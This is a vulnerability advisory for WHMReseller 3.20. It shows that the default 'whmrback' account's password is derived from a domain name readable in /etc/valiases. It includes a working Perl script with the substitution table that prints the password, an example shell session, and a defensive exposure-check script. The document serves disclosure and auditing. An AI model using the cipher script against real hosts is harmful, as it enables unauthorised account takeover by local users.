WHMReseller 3.20 - any local user could obtain the password to the default "whmrback" account



DESCRIPTION


When WHMReseller is installed, it adds a system account with the username "whmrback" and a "randomly" generated (not random) domain name. The password for the whmrback account can be determined from its associated domain name.



IMPACT


Local users could access the whmrback account.


This worked because the domain name for this account can be found in the /etc/valiases directory, with a prefix of "whmr-":

[user@host ~]$ ls -l /etc/valiases/whmr*
-rw-r--r--  1 whmrback mail 28 Aug 25 15:27 /etc/valiases/whmr-cadzcdcfmf.com
[user@host ~]$ ./whmreseller_whmrback_pass.pl cadzcdcfmf
The password to the whmrback account is: b06yb6bhdh


A trivial character substitution cipher maps "cadzcdcfmf" to "b06yb6bhdh", which is the password for the whmrback account.


#!/usr/bin/perl

use strict;
use warnings;

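# Domain label taken from the /etc/valiases file name, without "whmr-" and ".com"
my $whmrback = shift or die "usage: $0 <domain-label>\n";
my $pass = '';

# Substitution table as key/value pairs: domain character => password character
my %hash = qw(
    h 9 1 a c b k r b 1 a 0 d 6 s e o x
    f h t 3 w f 4 j r 8 e v j o l w x g
    2 n 7 t n 4 6 2 y 7 0 5 9 s 3 u p q
    q m z y m d 8 i i c g k 5 p v l u z
);

# Reverse the string so that chop, which removes the last character,
# yields the characters in their original left-to-right order.
$whmrback = reverse $whmrback;

for ( 1 .. length $whmrback )
{
    my $tmp = chop $whmrback;

    # Append the mapped character; characters not in the table are skipped.
    for my $k ( keys %hash )
    {
        if ( $tmp eq $k ) {
            $pass .= $hash{$k};
        }
    }
}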

print "The password to the whmrback account is: $pass\n";
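
To check a host for the condition described above, the following added example (not part of the original advisory or of WHMReseller) reports whether the whmrback account exists and whether the name of its "whmr-" domain file can be listed by other local users. The function name and status words are hypothetical, and the check is meant to be run as root.

```sh
#!/bin/sh
# Added audit example, not from the advisory. The account name, directory and
# "whmr-" prefix come from the advisory; function name and status words are
# hypothetical. Run as root so the directory is readable whatever its mode.
#
# whmrback_exposure [PASSWD_FILE] [VALIASES_DIR] prints one status word:
#   absent      no whmrback account in the passwd file
#   no-domain   account exists, but no whmr-* file was found
#   exposed     account exists and other users can list the whmr-* file name
#   restricted  account exists, but other users cannot list the directory
whmrback_exposure() {
    passwd_file=${1:-/etc/passwd}
    valiases_dir=${2:-/etc/valiases}

    # The first colon-separated passwd field must be exactly "whmrback".
    if ! grep -q '^whmrback:' "$passwd_file" 2>/dev/null; then
        echo absent
        return 0
    fi

    # Look for the domain file whose name the password is derived from.
    found=no
    for f in "$valiases_dir"/whmr-*; do
        if [ -e "$f" ]; then
            found=yes
            break
        fi
    done
    if [ "$found" = no ]; then
        echo no-domain
        return 0
    fi

    # Character 8 of the ls mode string is the "others: read" bit of the
    # directory, which decides whether unprivileged users can list file names.
    other_read=$(ls -ld "$valiases_dir" | cut -c8)
    if [ "$other_read" = r ]; then
        echo exposed
    else
        echo restricted
    fi
}

# Check the live system only when invoked as: script.sh --check
if [ "${1:-}" = "--check" ]; then
    whmrback_exposure
fi
```

A result of "exposed" means the domain name, and therefore the derived password, is available to every local user, so the whmrback password should be treated as known.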